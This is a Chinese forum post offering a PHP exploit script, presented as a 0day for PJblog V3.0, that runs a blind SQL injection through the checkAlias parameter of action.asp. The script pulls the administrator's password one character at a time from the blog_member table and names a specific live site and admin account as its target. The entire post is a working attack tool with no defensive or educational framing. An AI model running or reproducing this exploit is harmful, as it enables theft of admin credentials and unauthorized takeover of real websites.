- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
|
PJblog V3.0 0day Vbs版漏洞利用工具
- <?php
- /*
- PJblog V3.0 0day exp
- */
-
- $url="http://www.pjhome.net"; //注入地址
- $var_name="puterjam"; //管理员
- $var_key="check_right";
-
- if ($_SESSION["LenI"]){
- $LenI=$_SESSION["LenI"];
- }else{
- $LenI=1;
- }
- for($i=$LenI;$i<=40;$i++){
- if($_SESSION["LenDo"]){
- $StaAsc=$_SESSION["LenDo"];
- }else{
- $StaAsc=31;
- }
- echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
- for($j=$StaAsc;$j<=127;$j++){
- $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
- $var_pagelen=file_get_contents($newurl);
- $var_newpagelen=strpos($var_pagelen,$var_key);
- if($var_newpagelen == true){
- $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
- unset($_SESSION["LenDo"]);
- $_SESSION["LenI"]=$i+1;
- doReload();
- break;
- }
- if($j == $StaAsc+10){
- doReload();
- break;
- }
- }
- }
- if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }
-
- function doReload(){
- ?>
- <script language="javascript">
- <!--
- window.setTimeout('location.reload()',1000);
- //-->
- </script>
- <?php
- }
- ?>
复制代码 |
|